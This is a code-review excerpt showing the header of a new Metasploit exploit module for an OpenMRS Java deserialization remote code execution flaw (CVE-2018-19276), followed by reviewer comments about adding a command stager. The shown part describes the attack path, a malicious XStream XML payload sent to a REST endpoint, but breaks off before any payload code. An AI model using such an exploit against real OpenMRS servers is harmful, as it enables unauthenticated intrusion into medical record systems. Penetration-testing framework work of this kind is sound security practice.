modules/exploits/multi/http/openmrs_deserialization.rb

```diff
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenMRS Java Deserialization RCE',
+      'Description'    => %q(
+        OpenMRS is an open-source platform that supplies
+        users with a customizable medical record system.
+
+        There exists an object deserialization vulnerability
+        in the `webservices.rest` module used in OpenMRS Platform.
+        Unauthenticated remote code execution can be achieved
+        by sending a malicious XML payload to a Rest API endpoint
+        such as `/ws/rest/v1/concept`.
+
+        This module uses an XML payload generated with Marshalsec
+        that targets the ImageIO component of the XStream library.
+
+        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
+        8 and Java 9.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nicolas Serra', # Vuln Discovery and PoC
+        'mpgn',          # PoC
+        'Shelby Pace'    # Metasploit Module
+      ],
+      'References'     =>
+       [
+         [ 'CVE', '2018-19276' ],
+         [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
+         [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
+         [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
+       ],
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
```

Comment:
Is a command stager a viable target?

Reply:
I didn't have much luck with any previously, but I'll try it out once more.

Reply:
Updated with a command stager.